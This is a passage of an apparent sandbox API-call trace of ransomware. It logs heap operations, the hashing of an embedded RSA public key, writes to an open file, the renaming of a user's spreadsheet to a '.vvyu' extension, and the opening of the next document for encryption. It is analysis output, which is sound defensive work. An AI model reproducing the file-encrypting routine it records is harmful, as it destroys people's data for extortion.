0x2ea1210 [0193.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93888 | out: hHeap=0x620000) returned 1 [0193.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0193.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b20 | out: hHeap=0x620000) returned 1 [0193.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea1420 [0193.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0193.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0193.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea1638 [0193.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1420 | out: hHeap=0x620000) returned 1 [0193.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1638 | out: hHeap=0x620000) returned 1 [0193.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b38 | out: hHeap=0x620000) returned 1 [0193.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93870 | out: hHeap=0x620000) returned 1 [0193.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93810 | out: hHeap=0x620000) returned 1 [0193.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937f8 | out: hHeap=0x620000) returned 1 [0193.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95920 | out: hHeap=0x620000) returned 1 [0193.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1210 | out: hHeap=0x620000) returned 1 [0193.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.481] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0a68*, nNumberOfBytesToWrite=0x792, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea0a68*, lpNumberOfBytesWritten=0x312fb14*=0x792, lpOverlapped=0x0) returned 1 [0193.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.482] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x797, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.482] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0193.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea0a68 [0193.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea0a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea0e98 [0193.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.483] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea0e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e98 | out: hHeap=0x620000) returned 1 [0193.483] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.484] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.484] CloseHandle (hObject=0x568) returned 1 [0193.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea0a68 [0193.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.485] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\bMPGAJ9.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\bmpgaj9.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\bMPGAJ9.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\bmpgaj9.xlsx.vvyu")) returned 1 [0193.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.487] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.490] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c00ae80, ftCreationTime.dwHighDateTime=0x1d8a2d0, ftLastAccessTime.dwLowDateTime=0x57a24f70, ftLastAccessTime.dwHighDateTime=0x1d8a602, ftLastWriteTime.dwLowDateTime=0x57a24f70, ftLastWriteTime.dwHighDateTime=0x1d8a602, nFileSizeHigh=0x0, nFileSizeLow=0x4cd2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cqA0H3g9.ppt", cAlternateFileName="")) returned 1 [0193.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95920 [0193.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0193.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95920 | out: hHeap=0x620000) returned 1 [0193.491] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\cqA0H3g9.ppt") returned=".ppt" [0193.491] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\cqA0H3g9.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\cqa0h3g9.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.491] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=19666) returned 1 [0193.491] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.495] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x4cac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.495] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.497] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.497] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x4cd2, lpOverlapped=0x0) returned 1 [0193.498] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.498] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.498] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.498] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.499] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.499] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.499] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.500] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.500] GetLastError () returned 0x0 [0193.500] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.500] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.500] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.500] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.500] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4cd0) returned 0x2ea0a68 [0193.501] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.501] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95920 [0193.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937f8 [0193.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95968 [0193.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93810 [0193.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93840 [0193.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93870 [0193.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93828 [0193.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.502] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea5740 [0193.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93870 | out: hHeap=0x620000) returned 1 [0193.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea5740 | out: hHeap=0x620000) returned 1 [0193.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93870 [0193.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0193.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93828 [0193.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93840 [0193.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0193.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0193.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0193.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0193.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93870 | out: hHeap=0x620000) returned 1 [0193.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.504] GetCurrentThreadId () returned 0x66c [0193.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9f1d0 [0193.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.505] GetCurrentThreadId () returned 0x66c [0193.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93870 [0193.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93840 [0193.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0193.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93828 [0193.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93888 [0193.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93858 [0193.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0193.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643b38 [0193.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643b20 [0193.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x643b08 [0193.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b20 | out: hHeap=0x620000) returned 1 [0193.508] 